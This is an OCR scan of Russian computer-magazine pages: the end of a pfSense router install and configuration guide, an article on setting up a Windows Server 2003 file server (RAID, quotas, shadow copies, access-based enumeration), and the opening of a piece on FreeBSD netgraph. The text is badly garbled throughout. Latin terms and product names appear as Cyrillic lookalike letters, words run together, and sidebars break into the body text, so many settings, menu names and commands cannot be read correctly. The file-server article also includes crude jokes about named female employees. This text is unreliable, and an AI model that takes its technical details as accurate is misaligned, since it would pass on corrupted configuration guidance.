закончены, нажимаем <Еп1:ег>. Скрипт выведеттекущие 
настройки. 




> ѵѵагпіпд 

• При установке 
рі^Эепве будут уничто- 
жены все разделы на 
жестком диске. 

• В рі^Зепве правила 
файрвола работают до 
первого совпадения, 
поэтому запрещаю- 
щий рулесет следует 
разместить послед- 
ним. 



ЬАЫ -> СхрО 
ШАЫ -> Схрі 



Подтверждаем установки нажатием «у» и ждем, пока загрузит- 
ся система. 



Во уои ъ?апР Во ргосеззесі [у I п] ?у 

Угадать имена при наличии двух одинаковых сетевых кар- 
точек без знания их МАС-адресов часто бываеттяжеловато. 
Поэтому, если что-то не работает, просто поменяй местами 
интерфейсы в настройках или переподключи провода. Если 
будет обнаружено только одно сетевое устройство, появится 
предупреждение о невозможности работы в режиме роутера. 
Как и в тОпОѵѵаи, ЕАМ-интерфейс автоматически получает 
адрес 1 92.1 68.1 .1 , а ѴѴАМ — при помощи ВНСР. После ини- 
циализации системы появится системное меню настройки 
р^Эепве, вверху которого отражены текущие установки 
Сети: 

*ЬАЫ -> СхрО -> 192.168.1.1 

*ШАЫ -> Іхрі -> 192 . 168 . 175 . 128 (ВеНР) 
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> ІП^О 

• Текущая версия 
р^Зепве 1 .2, вышедшая 
в феврале 2008 года, 
базируется на РгееВЗО 
6 . 2 . 

• тОпОѵѵаи основан 
на РгееВЗО и кроме 
р^Зепве дал жизнь 
еще нескольким 
дистрибутивам. Самым 
популярным является 
РгееМАЗ (речь о нем 
шла в Х_08_2008). 

• РІопулярность 
рі^Зепзе довольно 
высока. Количество 
загрузоктолько с офи- 
циального сайта давно 
превысила 1 млн. 

• В р^Зепве поддержи- 
ваются средства для 
подключения к вирту- 
альным частным сетям 
и организации такого 
сервиса по протоколам 
ІРвес, РРТР, ОрепѴРМ. 

• Функциональность в 
р^Зепве, посравнению 
с родительским дист- 
рибутивом тОпОѵѵаи, 
увеличена на порядок. 

• В межсетевом экране 
по умолчанию активи- 
ровано два правила, 
разрешающих все со- 
единения наружу и за- 
прещающих подклю- 
чения из глобально 
немаршрутизируемых 
сетей (10/8, 172.16/12, 
192.168/16). 




разметка диска в пВогДаммеустановки р^ВепзД 

Когда ІР-адрес интерфейса ѴѴАМ назначается статически, 
то при определенных настройках Сети, после появления 
«Сопбдигіпд ѴѴАМ Іпіегі'асе», система как бы зависает, пытаясь 
получить нужный адрес. К сожалению, пропустить настройку 
ѴѴАМ никак нельзя, придется подождать. Встречается такой 
«эффект» не всегда, но лучшим выходом, если что, будет 
отключение внешнего кабеля, тогда скриптбыстрее перейдет 
к сл еду ю ще му эта пу. 

После инициализации появляется меню, состоящее из 1 5 
пунктов. Отсюда можно перезагрузить, остановить и обновить 
систему, сбросить настройки и пароль администратора 
веб-интерфейса, проверить доступность узла при помощи 
команды ріпд, просмотреть вывод рі^іор и журналы сервера, 
выйти в вИеН. Переназначить сетевые интерфейсы можно, 
выбрав пункт 1 — Аввідп Іпіегі'асев. После чего повторяем все 
шаги, описанные выше. Чтобы установить другой ІР-адрес для 
ВАМ, нажимаем цифру2 (5е1 ВАМ ІРаббгевв). Затем последо- 
вательно вводим новый ІР-адрес и сетевую маску. Последним 
вопросом будет: 

Во уои Во епаЫе Вііе ВСНР зегѵег оп ВАМ 

[у Іп] ? 

Отвечаем, в зависимости оттого, нужно сейчас запустить 
□ НСР-сервер для раздачи адресов во внутренней сети или 
нет. По окончании настройки скрипт выводит ІР-адрес, кото- 
рый нужно набирать в строке веб-браузера, чтобы получить 
доступ к веб-интерфейсу. 

Под цифрой 99 находится пункт, позволяющий установить 
рі^Зепзе на жесткий диск. Послеустановки он исчезает из 
меню. Кстати, дистрибутив необязательно устанавливать: 
если вставить дискету, при выключении все настройки будут 
сохранены на нее. 

УСТАНОВКА РР5ЕМ5Е НА ХАРД 

Несмотря на то, что рі^Зепзе — это урезанная версия РгееВЗО, 
его установка очень проста и нетребует каких-либо специфи- 
ческих знаний системы. Мастер установки, появляющийся 
после ввода 99 (Іпвіаіі рі^Зепве Іо Иагб бгіѵе ...), поможет произ- 
вести все необходимые действия. Но помни, все разделы на 
выбранном жестком диске будут уничтожены. При наличии не- 
которого опыта можно попробовать пристроить рі^Зепзе в ка- 
честве второй системы, но лучше для экспериментов исполь- 
зовать виртуальные машины, под которыми этот дистрибутив 
отлично работает (или другой винч). Сама установка занимает 
пять минут. Для записи настроек и перехода к следующему 
шагу выбираем «Ассері іИеве веШпдв». Перейти к следующе- 
му пункту можно при помощи стрелок или табуляции. 
Впервомокне доступны настройки шрифта и раскладки 
клавиатуры. Отмечаем «ІнзІаН рі^Зепве». Сначала выбираем 




(Вывод системной информации! 

жесткий диск, на который будем устанавливать систему, и 
форматируем его (Роггшаі; іЫв б ізк). Скрипт проверяет гео- 
метрию диска и выводит результат — обычно нет необходи- 
мости что-либо здесь менять. Отмечаем «СІве іЫв деотеігу» 
и записываем таблицу разделов (Рогтаі а 60). Тут добрый 
мастер предложит произвести разметку. В Ебіі рагііііоп 
можно создать несколько слайсов. Варианта, предложенного 
мастером, вполне достаточно, поэтому выбираем «Ассері апб 
Сгеаіе». Теперь надо выбрать слайс, на который будем уста- 
навливать р^Зепве. Он у нас один — отмечаем и в следующем 
окне подтверждаем нажатием «ОК». После создания слайса 
программа предложит создать два раздела: корневой и вѵѵар 
(1024 Мб). При желании можно изменить разметку, после 
чего начнется копирование необходимых файлов на диск. В 
состав рі^Зепзе входит четыре ядра: для однопроцессорных 
и многопроцессорных систем, встроенныхустройств (без 
драйверов Ѵ6А, клавиатуры ит.д.) и беѵеІорег(с 6ВВ). Выби- 
раем нужное. Последний шаг — установка загрузчика. Затем 
последует перезагрузка. 

Дальнейшие настройки производятся уже через веб-интер- 
фейс. 

НАСТРОЙКА ЧЕРЕЗ ВЕБ 

Подключаться к рі^Зепве можно пока только с ІАМ-интерфей- 
са. Набираем его адрес в строке браузера. Для регистрации 
используем логин абтіп и пароль рі^вепве. 

Послеуспешного входа тебя встретитЗеШрѴѴІгагб, задача ко- 
торого —упростить первоначальную настройку. В первом окне 
указываем имя и домен, к которому принадлежит компьютер, 
адреса ВМ5-серверов, настройки времени, часовой пояс и 
синхронизацию с сервером МТР. Что ж, приступаем к настрой- 
ке ѴѴАМ-подключения. Выбираемтип соединения: ВНСР, 
статический, РРРоЕ или РРТР. Установка флажков «Віоск 
ргіѵаіе пеіѵѵогкв» и «Віоск Ьодоп пеіѵѵогкв» создаст правила, 
блокирующие подключение к ѴѴАМ с адресов указанных сетей. 
Дальше, если хочешь, смени настройки ЕАМ-интерфейса. 

На последнем шаге мастера меняем парольадмина. Отуслуг 
мастера можно отказаться и настроить все самостоятельно, 

— поступай, кактебеудобнее. Повторно мастер вызывается в 
Зувіет ЗеШр ѴѴІгагб. 

По окончании настройки все соединения из внутренних сетей 
будут разрешены. Правила МАТ создаются автоматически 
(новички это оценят). Когда такие правила планируется созда- 
вать вручную, — нужно снять флажок«ВІ5аЫе МАТ Реііесбоп», 
который находится внизу страницы Зувіегш ^ Абѵапсеб. 
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Интерфейс р^Зепзе разбит на 7 основных вкладок: Зувіегш, 
Іпіегіасев, Рігеѵѵаіі, Зегѵісев, ѴРМ, Зіаіив и Оіадпо5І;іс5. При 
выборе каждой откроются дополнительные подпункты. Для 
примера разберем некоторые настройки. 

Если ІР-адрес ѴѴАМ-интерфейсузадается статически или 
динамически, то проблем с настройкой ѴѴАМ не предвидится. 
Путаница возникает, когда к провайдеру нужно подключиться, 
используя РРРоЕ или РРТР Какты помнишь, рі^Зепве поддер- 
живает однотакое соединение, и настроить его можнотолько 
в Іпіегі'асев — ѴѴАМ. Но где же тогда указывать настройки 
сетевого адаптера? В этом случае следует создать ѴЕАМ-ин- 
терфейс. Заходим в меню Іпіегі'асев — аввідп, переходим во 
вкладку ѴЕАМв и нажимаем <+>, чтобы создать новый интер- 
фейс. Потом укажи настройки сетевой карты во ѴЕАМ, а в ѴѴАМ 
— информацию о РРРоЕ. 

Обязательно зайди в Зувіегш — Оепегаівеіир! Здесьуказыва- 
ются: имя узла, адреса серверов ВМ5 (если они не получаются 
через ВНСР), имя пользователя и пароль администратора, а 
также — использование защищенного НТТР5 при подключе- 
нии через ѵѵеЬООІ, порт для соединения, тема оформления, 
часовой пояс и сервер МТР 

Поумолчанию сервер 55Н отключен. Если вдруг планируется 
удаленное управление по этому протоколу, то переходим во 
вкладку Зувіет — Абѵапсеб и устанавливаем флажок«ЕпаЫе 
Зесиге ЗЬеІІ». Для повышения безопасности в поле 55Н рогі 
можно указать отличный от 22-ого порт и активировать аутен- 
тификацию по ключу. Последний следует скопировать в поле 
АиіЬогігесІкеув. Во вкладке АбѵапсесІ можно включить первый 
последовательный порт (это отключит видеокарту и клави- 
атуру), функцию ЕІІІегіпд Вгібде; указать сертификаты для 
ѵѵеЬбІЛ; включитьбалансировку соединений, 1га ^бс вИареги 
другие параметры. 

Для настройки статической маршрутизации следует перейти 
в Зіаііс Роиіев и нажать <+>. В появившемся меню выбрать 
интерфейс и ввести адрес сети, шлюз и краткое описание. 
Настройка правил межсетевого экрана и МАТ производится 
в Рігеѵѵаіі — Риіев. Количество вкладок здесь равно числу 
используемых интерфейсов. Поумолчанию весь локальный 
трафик разрешен: в ЕАМ стоит правило «Веіаиіі ЕАМ апу», 
а из ѴѴАМ блокируется доступ только с адресов частных сетей 
(другими словами, входящие сетевые подключения с адресов 
из диапазонов 10/8, 172.16/12, 192.168/16 на внешний сетевой 
интерфейс запрещены). Правило МАТ формируется автомати- 
чески (Аиіотаііс оиіЬоипсІ МАТ гиіе депегабоп), поэтому сразу 
послеустановки рІЗепзе исполняет роль маршрутизатора с 
фильтрацией пакетов. 




(Настройка правил пакетного фильіД 



Новое правило создается очень просто. Для этого не нужно 
обладатьзнаниями РЕ, достаточно представлять конечный 
результат. Выбирается значение параметра, предложенного 
конфигуратором (адрес/интерфейс источника и назначения, 
протокол, порт или диапазон, расписание и прочее), — оши- 
биться здесьтяжело. Созданные правила можно расставлять по 
порядку. Обрати внимание на небольшойтреугольникслева от 
правила. Если он зеленый — правилоактивно, если серый — нет. 
Сначала создаем разрешающее правило, позволяющее 
соединяться удаленно через ѵѵеЬѲІЛ. Выбираем Абб пеѵѵ гиіе 
и указываем в Асбоп — Равз, Іпіегіасе — ЕАМ, Ргоіосоі — ТСР. 
Поля Зои гее и Вевбпабоп в том случае, когда используется 
80-ый порт, можно уста но вить в Апу, чтобы пользователи могли 
получить доступ к веб-ресурсам интернет. В Вевбпабоп рогі 
устанавливаем НТТР Аналогично настраивается доступ к 
остальным удаленным сервисам. По окончании настроек в 
поле Асбоп правила «Веіаиіі; ЕАМ апу» меняем значение с 
Равв на Віоск или Ре)есЕ Не забудь, что правила работают до 
первого совпадения, поэтому запрещающий рул есет следует 
разместить последним, используя кнопки Моѵе веіесіеб 
гиіе. По окончании всех настроек нажимаем кнопку «Арріу 
сбапдез». 

Во вкладке Рігеѵѵаіі также можно задать псевдонимы (аііазев), 
которые позволятупростить создание правил. При выборе 
пункта ТгабісЗбарегза пустится мастер настройки. На первом 
шаге следует выбрать внешний и внутренний интерфейсы и 
указать скорость Воѵѵпіоаб/Еіріоаб, а затем установить при- 
оритет для ѴоІР-сервисов. В Репабу Вохуказываются адреса, 
трафике которых будет идти с наименьшим приоритетом. 
Далее идут настройки ограничений для Р2Р-сетей, сетевых 
игр и остальных протоколов. 

Походу конфигурирования система выводит предупреждения 
вверху страницы. Обращай на них внимание: иногда требуется 
нажать кнопку/гиперссылку или перезагрузить компьютер, 
иначе настройки не вступят в силу. 

ВСЕ НЕ ЗРЯ 

Опыт показывает, что рІЗепве не зря пользуется популярнос- 
тью и получаетлестные отзывы ІТ-специалистов. Он прост в 
настройке и надежен в работе. Такой маршрутизатор вполне 
способен решить все задачи по представлению доступа и 
защите домашней/офисной сети. 




> Ііпкз 

• Проект тОпОѵѵаІІ: 

тОпО.сб/ѵѵаІЕ 

• Требования кобору- 
дованиюдля разных 
вариантов использо- 
вания рІЗепве распи- 
саны на сайте проекта 
ѵѵѵѵѵѵ.рівепве.сот в 
документе Нагбѵѵаге 
ЗІ 2 Іпд Оиібапсе. 

• Полный список 
возможностей рІЗепве 
приведен на странице 
Ееаіигев сайта проек- 
та ( ѵѵѵѵѵѵ.рівепве.сот ). 
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Моем файлы 

чисто-чисто 



Администраторы накопили огромный опыт воздвижения и эксплуатации 
«бюджетных» файловых серверов. Среди них с большим отрывом лидируют 
сервера на базе \Ѵіп2кЗ, который стал стандартом де-факто, Никсы 
в этой роли смотрятся недостаточно убедительно, доставляя проблемы тех- 
ническому персоналу. Впрочем, \Ѵіп2кЗ тоже не идеален. Чтобы раскрыть 
его потенциал, а заодно помочь начинающим администраторам избежать 
«классических» ошибок, и была написана эта статья. 



Локальные сети начинались с файловых серверов. Ими 
же, по сути дела, и закончились. Достаточно многие сидятс 
501, ѴѴЕВ, еіс, но еще больше народу используют файловые 
сервера: дома, в офисе, в корпоративной среде и так далее — вплотьдо 
глобальных распределенных систем с кучей точек доступа по всему миру. 
Заниматься глобализмом мы не будем, переложив решение проблем пла- 
нетарного масштаба на чужие плечи. Лучше обсудим вопросы, связанные 
с настройкой добротного файлового сервера в рамкахскромной локальной 
сети. 



МАЛЕНЬКИЙ СЕРВАЧОК И БОЛЬШОЙ СЕРВЕР 

Внешниежесткие диски с ЕіЬегпеІ-интерфейсом активнотеснят полноцен- 
ные файловые сервера, воздвигаемые на базе выделенных РС, встречаясь 
нетолько в домашних сетях, но и в офисах самых разных контор. Достоинст- 
ва: низкая цена (особенно в пересчете на один гигабайт), высокая масш- 
табируемость (закончилось дисковое пространство? просто покупаем еще 
один винт и втыкаем в сетевой порт), относительная безглючность (работают 
они под сильноурезанным Еіпих'ом, который, какизвестно, независает), 
предельно низкое энергопотребление (а, следовательно, более дешевая 
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УР5, обеспечивающая их бесперебойным питанием, в отсутст- 
вии которого говорить о сохранности информации можнотоль- 
ко в переносном метафизическом смысле), неприхотливость 
(внешниежесткие диски потребуют никакого обслуживания), 
невосприимчивость кбольшинствухакерскихатак. Плюс ко 
всему вышеперечисленному: компактность (очень важное 
обстоятельство для мини-офисов и домашних сетей). 
Недостатки: полная неуправляемость [внешний диск пред- 
ставляет собой «вещь в себе», работающую на автопилоте и 
нежелающую подчиняться воле администратора), невозмож- 
ность запуска антивируса внутри «коробки» (а вне «коробки» 
антивирус съедает всю пропускную способность локальной 
сети), практически непреодолимыетрудности с обновлением 
ядра и наложением заплаток на него и на Самбу (Сіпих, конеч- 
но, штука хорошая, но дыры в нем все-таки обнаруживаются, 
и если их не латать, сервачок можетзаразиться вирусом или 
руткитом, который способен привести к краху системы; ад- 
министратор будет вынужден разобрать «коробку», вытянуть 
оттуда жесткий диск и подключить его к РС — если, конечно, 
разработчики последнего не отодрали интерфейсный разъем, 
что частенько случается), низкая производительность при 
одновременном подключении нескольких десятков клиентов. 
В этуже корзину попадаютаппаратныеотказы самого диска 
[ведь РАЮ на базе внешнихжестких дисков на х86 никак не 
организуешь), сложности резервирования и поиска информа- 
ции, связанные с отсутствием служб журналирования и индек- 
сирования, которые опять-таки не работаютчерез ЕШегпеР 
Протолковое разграничение доступа мы вообще не говорим. 
Несмотря на это, внешниежесткие диски — не самый плохой 
вариант. Какфайловыесервера для дома ш них сетей и 
небольших офисов [где все равно никто не заботится ни о 
разграничении доступа, ни о резервировании) они вполне 
приемлемы. Какой смысл ставить РС, используя его в режиме 
«внешнегожесткого диска»? Именно в та ком режиме боль- 
шинство файловых серверов и работает! Переход на внешние 
жесткие диски вэтом случае экономит деньги иувеличивает 
надежность, сокращая количество отказов и затрудняя атаки 
на сервер. Что касается больших корпоративных сетей, то там 
внешниежесткие диски могутуспешно «симбиотить» с насто- 
ящими файловыми серверами и использоваться для хранения 
разделяемых данных, некритичных к разрушению. 
Воздвигнуть сервер можно и на основе РС. Особенно, если это 
— сервер файловый. Ему ни к чему большие процессорные 
мощности и 5МР, избытокоперативной памяти превращает- 
ся в бесполезный балласт, а скоростные РАЮ-контроллеры 
упираются в бутылочное горлышко тонкой витой пары. Список 
ненужных вещей можно продолжать еще долго, поэтому 
лучше остановиться на формулировке: «нетребовательность 
к аппаратной конфигурации». Подойдет любое [почти любое!) 
железо, что есть под рукой. Правда, не обойтись без знания 
кое- каких тон костей. 

ВЕРНОСТЫОО-МЕГАБИТКЕ 

Национальным стандартом де-факто стал 1 00-мегабитный 
ЕіЬегпеЕ Гигабитый уже давно не новость, но большого рас- 
пространения онтаки не получил. Что изменяет переход на 
гигабитные каналы? А ничего! Диск — быстрее, сеть — мед- 
леннее. Да, конечно, в гигабитный канал вмещается намного 
больше данных, и в крупных сетях разница все-таки видна. 
Однако это должна быть действительно крупная и сильно за- 
груженная сеть, иначе выигрыш в производительности можно 
зафиксироватьтолько с помощью хронометра. Но крупные 
сети строятся совсем подругой схеме [разбиваются на сегмен- 
ты и администраторы заботятся о балансировке нагрузки). 

В 99% случаях правильно спроектированная сеть не 




испытывает острой потребности в гигабитных каналах — а 
неправильной и гигабита будет мало! Учитывая, что гигабит- 
ная инфрастуктура требует определенных инвестиций как в 
оборудование, так и втопологию самой сети, целесообраз- 
ность ее использования — предметострых дискуссий, которые 
мы обойдем стороной, оставшись верны старому доброму 
1 00-мегабитному ВЬегпеЕу. 





С МАТРИЦЕЙ И БЕЗ 

Файловому серверу позарез нужна матрица из нескольких дис- 
ков, объединенная в общий РАЮ. Какой же файловый сервер 
без РАЮ’а? И зачемтогда вообще нужны матрицы?Такие мыс- 
ли естьу народа. Ошибочность этого мнения дорого обходится. 
РАЮ'ы они, мягко говоря, для другого предназначены: 

а) для работы с файлами/разделами оченьбольшого размера 
[ныне неактуально; монтируемые файловые системы и огром- 
ные объемы современных винчестеров делаютсвое дело — и 
чем дальше, тем больше); 

б) для увеличения пропускной способности дискового вво- 
да/вывода; в первую очередьэто актуально для баз данных и 
станций цифрового видео-монтажа; 

в) для серверов, критичных котказу в обслуживании, сокном 
восстановления меньше часа или даже вовсе без такового [тот 
же самый функционал обеспечивает программный РАЮ плюс 
Иоі-ріид на бюджетном 5АТА). 

РАЮ'ы [в общем случае) практически неуменьшают веро- 
ятности потери данных, поскольку отказ жесткого диска не 



[Выставляем квоть^ 




> Ипкз 

Об особенностях 
использования АВЕ 
можно прочить в блоге 
Ыодв.тісгово^і.со.іі . 
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• Подробнее о теневом 
копировании можно 
прочитать в статье 
«Движение втени», 
опубликованной в 
Х_03_2008. 

•ДВЕ позволяет 
администратору 
скрывать хранящиеся 
на общедоступных ре- 
сурсах папки и файлы 
оттех пользователей, 
которые не имеют 
разрешений на доступ 
к ним на уровне МТР5. 

• С помощью политики 
дисковых квот можно 
ограничить объем дис- 
кового пространства, 
занимаемого данными 
пользователя на томе 
МТР5, и определить 
реакцию системы на 
превышение пользо- 
вателем своей квоты 
или на достижение им 
заранее определен- 
ного «порога выдачи 

п редуп режден и й ». 

• Если поднимаешь 
файловый сервер на 
базеѴѴІп2кЗ, не забудь 
в свойствах сетевого 
подключения открыть 
свойства Рііе апсі 
РгіпіегЗЬагіпд ^ог 
Місгозо^і Меіѵѵогкз 
(службы доступа к фай- 
лам и принтерам) и от- 
метить пункт Махігшіге 
сіаіа іЬгоидЬриИогРІе 
вЬагіпд. 





[Включениетеневого копирования в ѴѴІп2кЗ| 



единственная (и не самая частая) причина аварии. Более 
того, в 9 случаях из 1 0 винчестер выходит из строя не сразу, а 
постепенно. Диа гностические утилиты позволяют предвидеть 
возможный выход из строя за несколько дней, недель, а то 
и месяцев. Ктомуже, РАЮ’ы все равно не отменяют необ- 
ходимость резервирования (поскольку не предотвращают 
логические разрушения, хакерские и вирусные атаки), а если у 
нас естьсвежий бэкап — такли нам нужен РАЮ? 

Дешевые РАІО’ы (особенноте, что встроены в материнскую 
плату) — весьма вредоносная штука. Они содержат множество 
ошибок, приводящих к возможным потерям данных и славятся 
внезапными отказами, а найти плату с совместимым или иден- 
тичным РАЮ’ом нетак-то просто. Внешние РАЮ’ы (контрол- 
леры, вставляемые в слот) более надежны, однако бюджетные 
модели все равно глючат, а стоимость дорогих соизмерима со 
стоимостью сервера в целом. Смысл?! 

А как насчет программного РАЮ 'а? Идея, конечно, заманчи- 
вая, но винчестеры, посаженные на разные порты контролле- 
ра, дадут намного больший выигрыш в производительности, 
если файлы, запрашиваемые пользователями, равномерно 
распределены между ними. Та к что, чем больше у нас винчес- 
теров, необъединенных в матрицу, тем выше производитель- 
ность, — реально выше, а не по хронометру (хинт: винчестеры 
медленно ищут файлы, но быстро их читают, а потому парал- 
лельный РАЮ неувеличиваетпроизводительности, тогда как 
пара независимыхжестких дисков — пожалуйста). 

СКУПОЙ ПЛАТИТ ДВАЖДЫ 

Мифы прото, что, дескать, существуют файловые системы, не 
подверженные фрагментации, немедленно разоблачаются, 
кактолько эти файловые системы приобретают популярность. 
Фрагментация была, есть и будет. А достойных фрагмента- 
торов — особенно сучетом большого количества открытых 
файлов на сервере... гм... 



Всякий раздел изначально обречен на неуклонную деграда- 
цию производительности, и под МТР5 еще нет дефрагментато- 
ров, способных восстановить больного на 1 00%. Единственная 
мера — реформате повторной заливкой файлов, временно 
сохраненных в другом месте. Но это радикальный вариант. 
Замедлить темпы падения производительности (Крис, ты 
прямо как на пленуме ЦК КПСС выступаешь, — Прим, ред.) 
помогает правильный выбор размера кластера. Больше 
— значит, лучше. Конечно, сувеличением размера кластера 
возрастают и потери дискового пространства, так как МТЕ5 не 
умеет использовать пустые хвосты кластеров (НЕЗ, поддержи- 
ваемая ЕгееВЗО, —умеет). Но дисковое пространство стоит 
копейки, а низкая производительность компьютера оборачи- 
вается низкой производительностью труда, вылетая в сотни и 
даже тысячи рублей. 

ВОЗВРАТ К ПЕРВОБЫТНООБЩИННОМУ СТРОЮ 

В древние времена на род жил в пещерах, и все в племени 
знали другдруга. Офисы — это те же самые пещеры, хоть и с 
евроремонтом. И понятиятам первобытнообщинные. Кто тро- 
гал мой файл и весь вытрогал? Кто съел мой бутерброд, утянул 
чайник и исписал весь маркер? Верните чайник на место! И 
файл мой отдайте! Какэтотак; ассевв бепіесі?! 

Бедный администратор! Он всю неделю планировал систему 
разграничения доступа. Ага, Маша и Катя — они у нас в бух- 
галтерии, и потому члены одной группы (вообще говоря, они 
лесбиянки и работают попеременно то с одного, то с другого 
компьютера, а чаще всего — вообще не работают, а ищут себе 
любовниц на Іоѵе.таіі.гц ). АвотЛенаужедавно не... В смысле, 
она шарит в компьютерах, ѵѵеЬ-дизайне и пишет движок для 
сайта компании на ВНР. Зачем ей доступ кфайлам Маши и 
Кати?! Выделим ее в отдельную группу! 

Теперь Борис (он у нас юрист) хочет видеть на сайте компании 
красивые графики, визуализирующие отчетность Маши с 
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Служба тенево го копирования несвободна отошибоки иногда] 
не за пуска ется| 

Катей. Что делает Лена? Правильно, пинает администратора, чтобы он ей 
предоставил доступ к файлам. То же самое делает и Борис. В результате, 
рано или поздно мы приходим к полному уравнению в правахс незначи- 
тельными исключениями для администратора. 

Разграничение доступа реально необходимо лишьоченьбольшим компа- 
ниям. Во всех остальных случаях — это головная боль в чистом виде. Вместо 
того, чтобы заниматься делом, сотрудники бегают по отделам в поисках лиц, 
имеющих доступ кданному файлу. Даже если это архив, который на первый 
взгляд нужен только тому, кто занимается резервированием, и который же- 
лательно защитить от бесконтрольного доступа. Но, увы, жизненные реалии 
таковы, что архив нужен всем, пусть не постоянно, а время от времени. 
Конечно, понятие конфиденциальности никто не отменял, и далеко не 
всем сотрудникам дозволено видеть файлы своих соседей. Втеории. На 
практике же, если в компании завелся вредитель, то он ихувидит, даже 
если администратор воздвигнет многоступенчатую систему защиты. Если 
же вредителей нет — от кого нам тогда защищаться? Вопрос риторический, 
четкого ответа не имеющий. Умные администраторы отличаются от глупых 
тем, что не занимаются самодеятельностью, а раздают сотрудникам права, 
спущенные вышестоящим руководством, которому и приходится отдуваться 
за все разборки Маши, Кати, Лены и Бориса. 

КВОТЫ 

и все-таки — кто увел наш любимый чайник?Уже второй день весьотдел без 
чая. О какой производительности труда может идти речь? Наглядное свиде- 
тельствотого, что если кресло не привязать цепью, стоиттолько оторвать от 
него свой зад, как опускать обратно будетуже некуда. Потому как кресло кто- 
то стащил. Разбирайся потом, кто. Точнотак и с дисковым пространством. В 
отличиеотразграничения доступа, дисковые квоты — великое дело! 
Винчестеры они, конечно, очень большие, но не резиновые. Пользователи 
создадут кучу копий одного итого же файла, растасованных по разным 
папкам, притаранят несколько Гб фотографий в стиле «Маша с Катей поко- 
ряют Крым». Про музыку, клипы и порно мы вообще молчим. Одним словом, 
файловый сервер может молниеносно превратиться в файловую помойку. 

В чем проблема?Апроблема в резервировании, обычно осуществляемом 
на ВѴВ, объем которого намного меньше объема жестких дисков, и потому 
сохранение всех файлов сервера вылетает в копеечку, способствуя разо- 
рению фирмы. С другой стороны, объем реально нужных файлов нетакуж и 
велик. Главное — не резервировать всякий мусор. Атоу Маши новая супер- 
пупер мегапискельная камера, да еще и с записью видео. 




Управление разделяемыми редрсами| 

Чтобы прищемить беспредельниц, как раз и нужны квоты. Хочет Маша залить 
на сервер свои фотографии — пусть это делает под именем юзера Хипарь 
(от английского Ьеар, «куча»), а под рабочие файлы ей выделить, максимум, 
гигабайт — заодно и дубликаты файлов со временными копиями удалит. 

ИГРАТЕНЕЙ 

Каклучше всего проводить резервирование? Разумеется, по расписанию. 
Когда все пользователи ушли, закрыли все файлы, и ничто не мешает их 
копированию (файлы, открываемые на запись, обычно блокируются). Вот 
только нереально это. Кто-то открыл кучу файлов и ушел домой, оставив 
компьютер включенным. Или фирма работаетвтри смены. Да малоли еще 
что... 

Чтобы разрешить проблему, вѴѴІп2кЗ реализованотак называемое «тене- 
вое копирование» (вЬасІоѵѵсоріев). Если говорить просто — это фоновое 
копирование, осуществляемое на секторном уровне (вообще-то, кластер- 
ном, но когозаботяттакие мелочи) и работающее втесном взаимодействии 
с МТГ5. Копируются даже файлы, открытые на запись и заблокированные от 
совместного чтения. 

Теневое копирование поддерживает множество резервирующих программ 
(втом числе, и штатная утилита М5 Васкир) и вникать втехнические детали 
реализации для его использования, в общем-то, не обязательно. 

ОБОРОННАЯ ИНИЦИАТИВААВЕ 

Аббревиатура АВЕ расшифровывается как Асееве ВавесІ Епитегабоп. Это 
такая секьюрная фича, стоящая на страже безопасности данных. Как и 
следует из ее названия, АВЕ позволяетскрывать сам факт существования 
разделяемых ресурсов отопределенных групп пользователей, включая 
анонимусов (то есть, всех праздношатающихся хакеров). 

Теоретически, это усложняет взлом, поскольку хакеру необходимо нетолько 
подобрать пароль к ресурсу, но еще и угадать имя самого ресурса (напри- 
мер, имя папки с разделяемыми документами). Впрочем, как показывает 
практика, администраторы склонны давать разделяемым ресурсам вполне 
предсказуемые имена, а потому АВЕ не есть панацея. 

С другой стороны, когда пользователь не видит ресурсов, к которым он не 
имеет прав доступа, он не нервничаети не задает глупых вопросов адми- 
нистратору (типа: «а почему у меня не открывается папка ТорБесгеІ?»). Так 
что использование АВЕ даже в мирных целях весьма перспективно. 

ЗАКЛЮЧЕНИЕ 

Окончание статьи еще не означает конца всех проблем. С воздвижением 
сервера (не обязательно файлового) проблемы только начинаются. Собс- 
твенно говоря, администратор представляет собой биокомпьютер, обслу- 
живающий другие биокомпьютеры (пользователей), ну и попутно решаю- 
щий, стоит л и выливать воду из чайника через вентиляционные отверстия 
сервера, или пускай пока живет. А вот когда окончательно достанут — точно 
выльет. Пока его чинят, он хоть немного отдохнет. «Его» — это администра- 
тора, «он» — в смысле, сервер. Или наоборот? ~н~ 
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СЕРГЕЙ «ОВІМОЕВ» ЯРЕМЧУК 

/ СН1ЫОЕН@иА.РМ / 



ИНТЕРЕСНЫЕ ВОЗМОЖНОСТИ СЕТЕВОЙ ПОДСИСТЕМЫ НЕТСВАРН 



Стандартные настройки сети в РгееВЗО обычно не вызывают особых про- 
блем. В интернете полно документации, процесс конфигурирования описан 
вдоль и поперек. Но при объединении нескольких сетей в одну, подсчете 
трафика и балансировке нагрузки приходится изрядно попотеть. К счастью, 
есть элегантный выход — использовать пеі;§гар1і. 



1996 — 2008 

Сетевая подсистема пеІдгарЬ была создана в 1996 году Джулианом Элис- 
чером и Арчи Коббсом, как попытка исправить ограниченную поддержку 
некоторого оборудования и протоколов в РгееВЗО. Первые варианты были 
доступны в специальной версии РгееВЗО 2.2, собираемой для компании 
ѴѴЫвие Iп1;ег^е1;, а дебют в основном дереве состоялся в РгееВЗВ 3.4. Сегод- 
ня пеІдгарЬ — это часть ядра ОС. Основная идея подсистемы — модульность 
и комбинация простых инструментов для реализации более сложного 
решения. 

МеІдгарЬ строится на взаимодействии узлов (посіев), которые посредством 
крючков (Ьоокв) создают пару захвата (одну для каждого узла). Крючок 
узла формируется в моментсвязывания и определяет, какузел может 
быть подключен. Данные идутв двух направлениях вдоль ребер (есідев) 
отузла кузлу. Когда узел получает пакет данных, он его обрабатывает и 
зате м отп ра вл я ет д ру го му узлу. Узел м ожет б ыть и сточ н и ко м/п отреб ител е м 
данных, например, если он связан с аппаратной частью, или может просто 
добавлять/удалять заголовки, выполнять мультиплексирование ит.п. 
Поначалу количествоузлов было небольшим, но с каждой новой верси- 
ей их количество увеличивалось. Для РгееВЗО 6.x уже были доступны 
модули, обеспечивающие поддержку: РРРоЕ, АТМ, І50М, ВІиеІооШ, НВ ЕС, 
ЕіЬегСЬаппеІ, Егате Реіау, Е2ТРи др. Система построена так, что добавить 
новый модульоченьлегко. В ЕгееВЗВ 7.0 появились новыеузлы: пд_саг 
(алгоритмы ограничения трафика и гаіе-лимитов), пд_сіейа1;е (поддержка 
Вейаіе сжатия для РРР) и пд_ргес11 (Ргесіісіог-І сжатие для РРР). 

